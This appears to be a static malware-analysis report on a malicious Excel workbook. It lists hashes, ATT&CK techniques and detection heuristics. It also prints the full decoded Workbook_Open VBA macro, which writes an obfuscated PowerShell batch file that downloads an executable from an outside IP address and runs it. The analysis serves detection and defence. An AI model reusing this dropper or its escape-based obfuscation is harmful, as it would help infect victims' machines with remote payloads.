Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 5b45f6d7596b9b91…

MALICIOUS

Office (OLE) / .XLS

48.5 KB Created: 2021-04-13 13:37:17 Authoring application: Microsoft Excel First seen: 2021-11-07
MD5: c588a5a11fb750d921809bad60c8e2c2 SHA-1: 3900ba9b61d4f4e1fcf07f09404a99266382211e SHA-256: 5b45f6d7596b9b91be76f2a325fca683635129506f235e415779a3e20820e696
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The Workbook_Open VBA macro is designed to stage a PowerShell command that downloads an executable file from 'http://18.156.71.237/hN/5/B/RFQ_5550_178_03308IMG.exe' and saves it as 'C:\Users\Public\Documents\radiocouple.exe'. The macro then executes this downloaded file. The GetObject call is used to facilitate the creation and execution of a batch file, 'C:\Users\Public\Documents\god.bat', which orchestrates the download and execution process.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Private Sub Workbook_Open()
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set reallyshort = GetObject("new:0D43FE01-F093-11CF-8940-00A0C905422" & CInt(7.6))
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1346 bytes
SHA-256: adccb6bbbebdd871e5af9634893cd181fd210ab8ab548cb2f7a174a16976d7da
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
becomeavoid = "pow^ers"
Congressdifference = "he^ll"
Set reallyshort = GetObject("new:0D43FE01-F093-11CF-8940-00A0C905422" & CInt(7.6))
alsoon = "C:\Users\Public\Documents\god.bat"
Set reallyshort2 = reallyshort.CreateTextFile(alsoon)
reallyshort2.WriteLine becomeavoid & Congressdifference & " -w hi sl^eep -Se 31;St^a^rt-BitsTr^ans^fer -Source htt`p://18.156.71.237/hN/5/B/RFQ_5550_178_03308IMG.e`xe -Dest C:\Users\Public\Documents\radiocouple.e`xe;C:\Users\Public\Documents\radiocouple.e`xe"
reallyshort2.Close
GetObject("new:13709620-C279-11CE-A49E-44455354000" & CInt(0.3)).Open (alsoon)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub firenotice()
'
' firenotice Macro
' 1Y9EPHD78LD1
'
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.